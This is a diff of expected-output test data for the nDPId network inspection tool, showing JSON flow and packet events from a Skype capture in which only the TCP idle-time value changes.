00666{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":819,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":128,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970660848,"flow_last_seen":1431970660848,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1431970660848,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.24","src_port":13021,"dst_port":40032,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} 00594{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":820,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":129,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970660848,"flow_last_seen":1431970660848,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431970660848,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.160","src_port":13021,"dst_port":40016,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":820,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":129,"flow_packet_id":1,"flow_last_seen":1431970660848,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1431970660848,"pkt":"0NQSxnP1PBXCt3IOCABFAAA4j48AAEARa97AqAEib91NoDLdnFAAJOlwe1ECSObCw6nUMfh7bnqIU3mueprtSIlR2AyZTQ=="} 00667{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":820,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":129,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970660848,"flow_last_seen":1431970660848,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431970660848,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.160","src_port":13021,"dst_port":40016,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":831,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":130,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970661447,"flow_last_seen":1431970661447,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970661447,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.166","src_port":51253,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":831,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":130,"flow_packet_id":1,"flow_last_seen":1431970661447,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970661447,"pkt":"0NQSxnP1PBXCt3IOCABFAABAYfhAAEAGv0vAqAEiQAQXpsg1Abs0yMrkAAAAALAC\/\/8mywAAAgQFtAEDAwUBAQgKPjHu7gAAAAAEAgAA"} -00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":833,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":130,"flow_packet_id":2,"flow_last_seen":1431970661649,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970661649,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADYGK0hABBemwKgBIgG7yDUuR6JLNMjK5aASOJDvYAAAAgQFrAQCCApMQvL8PjHu7gEDAwk="} -00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":834,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":130,"flow_packet_id":3,"flow_last_seen":1431970661649,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970661649,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0asRAAEAGtovAqAEiQAQXpsg1Abs0yMrlLkeiTIAQECxFxAAAAQEICj4x77VMQvL8"} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":831,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":130,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970661447,"flow_last_seen":1431970661447,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970661447,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.166","src_port":51253,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":831,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":130,"flow_packet_id":1,"flow_last_seen":1431970661447,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970661447,"pkt":"0NQSxnP1PBXCt3IOCABFAABAYfhAAEAGv0vAqAEiQAQXpsg1Abs0yMrkAAAAALAC\/\/8mywAAAgQFtAEDAwUBAQgKPjHu7gAAAAAEAgAA"} +00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":833,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":130,"flow_packet_id":2,"flow_last_seen":1431970661649,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970661649,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADYGK0hABBemwKgBIgG7yDUuR6JLNMjK5aASOJDvYAAAAgQFrAQCCApMQvL8PjHu7gEDAwk="} +00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":834,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":130,"flow_packet_id":3,"flow_last_seen":1431970661649,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970661649,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0asRAAEAGtovAqAEiQAQXpsg1Abs0yMrlLkeiTIAQECxFxAAAAQEICj4x77VMQvL8"} 00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":854,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":131,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970661855,"flow_last_seen":1431970661855,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431970661855,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.28","src_port":13021,"dst_port":40026,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":854,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":131,"flow_packet_id":1,"flow_last_seen":1431970661855,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970661855,"pkt":"0NQSxnP1PBXCt3IOCABFAABAgx0AAEARe8zAqAEib91KHDLdnFoALOnqe1MCA8GYjWWu9fDS5z8O1HnUzLtilbW9STWNzZ4dxAZIYogR"} 00666{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":854,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":131,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970661855,"flow_last_seen":1431970661855,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431970661855,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.28","src_port":13021,"dst_port":40026,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} @@ -504,28 +504,28 @@ 00667{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":895,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":145,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970665893,"flow_last_seen":1431970665893,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1431970665893,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.148","src_port":13021,"dst_port":40033,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} 00192{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":897,"source":"skype_no_unknown.pcap","alias":"nDPId-test","layer_type":94,"global_ts_msec":1431970666370} 00417{"packet_event_id":1,"packet_event_name":"packet","packet_id":897,"source":"skype_no_unknown.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":100,"pkt_type":94,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":100,"pkt_l4_len":0,"thread_ts_msec":1431970666274,"pkt":"AQAMzMzMJKQ8\/kzXAF6qqgMAAAwgAAF4S2kAAQAOQWlyR2F0ZXdheQACABEAAAABAQHMAATAqAHbAAQACAAAAAIABQAQQWlyR1cudjEuMC4zAAYAB0FHVwADAAdicjAA\/wAFLg=="} -00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":899,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":146,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970666902,"flow_last_seen":1431970666902,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970666902,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.142","src_port":51255,"dst_port":40005,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":899,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":146,"flow_packet_id":1,"flow_last_seen":1431970666902,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970666902,"pkt":"0NQSxnP1PBXCt3IOCABFAABAb9VAAEAG6VLAqAEinTeCjsg3nEXoG0e9AAAAALAC\/\/9+tAAAAgQFtAEDAwUBAQgKPjIEMAAAAAAEAgAA"} -00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":900,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":147,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970666902,"flow_last_seen":1431970666902,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970666902,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.142","src_port":51256,"dst_port":40013,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":900,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":147,"flow_packet_id":1,"flow_last_seen":1431970666902,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970666902,"pkt":"0NQSxnP1PBXCt3IOCABFAABAZOhAAEAGVprAqAEib91Njsg4nE30S7v3AAAAALAC\/\/9gmwAAAgQFtAEDAwUBAQgKPjIEMAAAAAAEAgAA"} -00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":901,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":148,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970666903,"flow_last_seen":1431970666903,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970666903,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.170","src_port":51257,"dst_port":40032,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":901,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":148,"flow_packet_id":1,"flow_last_seen":1431970666903,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970666903,"pkt":"0NQSxnP1PBXCt3IOCABFAABAp19AAEAGSKzAqAEinTfrqsg5nGDRQCL5AAAAALAC\/\/9RGgAAAgQFtAEDAwUBAQgKPjIEMAAAAAAEAgAA"} -00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":902,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":149,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970666903,"flow_last_seen":1431970666903,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970666903,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.176","src_port":51258,"dst_port":40021,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":902,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":149,"flow_packet_id":1,"flow_last_seen":1431970666903,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970666903,"pkt":"0NQSxnP1PBXCt3IOCABFAABAfbxAAEAGcbnAqAEi1cezsMg6nFWOWkeEAAAAALAC\/\/9u6QAAAgQFtAEDAwUBAQgKPjIEMAAAAAAEAgAA"} +00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":899,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":146,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970666902,"flow_last_seen":1431970666902,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970666902,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.142","src_port":51255,"dst_port":40005,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":899,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":146,"flow_packet_id":1,"flow_last_seen":1431970666902,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970666902,"pkt":"0NQSxnP1PBXCt3IOCABFAABAb9VAAEAG6VLAqAEinTeCjsg3nEXoG0e9AAAAALAC\/\/9+tAAAAgQFtAEDAwUBAQgKPjIEMAAAAAAEAgAA"} +00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":900,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":147,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970666902,"flow_last_seen":1431970666902,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970666902,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.142","src_port":51256,"dst_port":40013,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":900,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":147,"flow_packet_id":1,"flow_last_seen":1431970666902,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970666902,"pkt":"0NQSxnP1PBXCt3IOCABFAABAZOhAAEAGVprAqAEib91Njsg4nE30S7v3AAAAALAC\/\/9gmwAAAgQFtAEDAwUBAQgKPjIEMAAAAAAEAgAA"} +00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":901,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":148,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970666903,"flow_last_seen":1431970666903,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970666903,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.170","src_port":51257,"dst_port":40032,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":901,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":148,"flow_packet_id":1,"flow_last_seen":1431970666903,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970666903,"pkt":"0NQSxnP1PBXCt3IOCABFAABAp19AAEAGSKzAqAEinTfrqsg5nGDRQCL5AAAAALAC\/\/9RGgAAAgQFtAEDAwUBAQgKPjIEMAAAAAAEAgAA"} +00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":902,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":149,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970666903,"flow_last_seen":1431970666903,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970666903,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.176","src_port":51258,"dst_port":40021,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":902,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":149,"flow_packet_id":1,"flow_last_seen":1431970666903,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970666903,"pkt":"0NQSxnP1PBXCt3IOCABFAABAfbxAAEAGcbnAqAEi1cezsMg6nFWOWkeEAAAAALAC\/\/9u6QAAAgQFtAEDAwUBAQgKPjIEMAAAAAAEAgAA"} 00594{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":903,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":150,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970666903,"flow_last_seen":1431970666903,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1431970666903,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.149","src_port":13021,"dst_port":40016,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":903,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":150,"flow_packet_id":1,"flow_last_seen":1431970666903,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":75,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":75,"pkt_l4_len":41,"thread_ts_msec":1431970666903,"pkt":"0NQSxnP1PBXCt3IOCABFAAA9fE8AAEARfyTAqAEib91NlTLdnFAAKVN0e20CYiNLpCtZKVRm5qzsJsm2qgqqm\/VHJHAXu9AEnz3Z"} 00667{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":903,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":150,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970666903,"flow_last_seen":1431970666903,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1431970666903,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.149","src_port":13021,"dst_port":40016,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} 00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":904,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":151,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970666903,"flow_last_seen":1431970666903,"flow_idle_time":180000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1431970666903,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.19","src_port":13021,"dst_port":40001,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":904,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":151,"flow_packet_id":1,"flow_last_seen":1431970666903,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":73,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":73,"pkt_l4_len":39,"thread_ts_msec":1431970666903,"pkt":"0NQSxnP1PBXCt3IOCABFAAA7vtoAAEARQB3AqAEib91KEzLdnEEAJxFYe28CrL8oxTm2+6Ol0c4xcn\/aCmr6scDIaqNamEoS7g=="} 00666{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":904,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":151,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970666903,"flow_last_seen":1431970666903,"flow_idle_time":180000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1431970666903,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.19","src_port":13021,"dst_port":40001,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} -00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":905,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":149,"flow_packet_id":2,"flow_last_seen":1431970666958,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970666958,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADgG93nVx7OwwKgBIpxVyDpdiXkDjlpHhaASOJCjtgAAAgQFrAQCCApO3n4vPjIEMAEDAwk="} -00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":906,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":149,"flow_packet_id":3,"flow_last_seen":1431970666958,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970666958,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0TkBAAEAGoUHAqAEi1cezsMg6nFWOWkeFXYl5BIAQECz6qQAAAQEICj4yBGdO3n4v"} -00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":908,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":148,"flow_packet_id":2,"flow_last_seen":1431970666974,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970666974,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADYG+g+dN+uqwKgBIpxgyDkZrLIb0UAi+qASOJChgQAAAgQFrAQCCApMVm\/iPjIEMAEDAwk="} -00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":909,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":148,"flow_packet_id":3,"flow_last_seen":1431970666974,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970666974,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0VXBAAEAGmqfAqAEinTfrqsg5nGDRQCL6GayyHIAQECz4ZQAAAQEICj4yBHZMVm\/i"} -00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":915,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":146,"flow_packet_id":2,"flow_last_seen":1431970667029,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970667029,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADcGYiydN4KOwKgBIpxFyDfIYnGx6BtHvqASOJAYmAAAAgQFrAQCCApOwLWvPjIEMAEDAwk="} -00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":916,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":146,"flow_packet_id":3,"flow_last_seen":1431970667029,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970667029,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0ekBAAEAG3vPAqAEinTeCjsg3nEXoG0e+yGJxsoAQECxvRgAAAQEICj4yBKxOwLWv"} -00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":926,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":147,"flow_packet_id":2,"flow_last_seen":1431970667195,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970667195,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADcGxIZv3U2OwKgBIpxNyDjFFwvv9Eu7+KASOJAFzgAAAgQFrAQCCApNkBSePjIEMAEDAwk="} 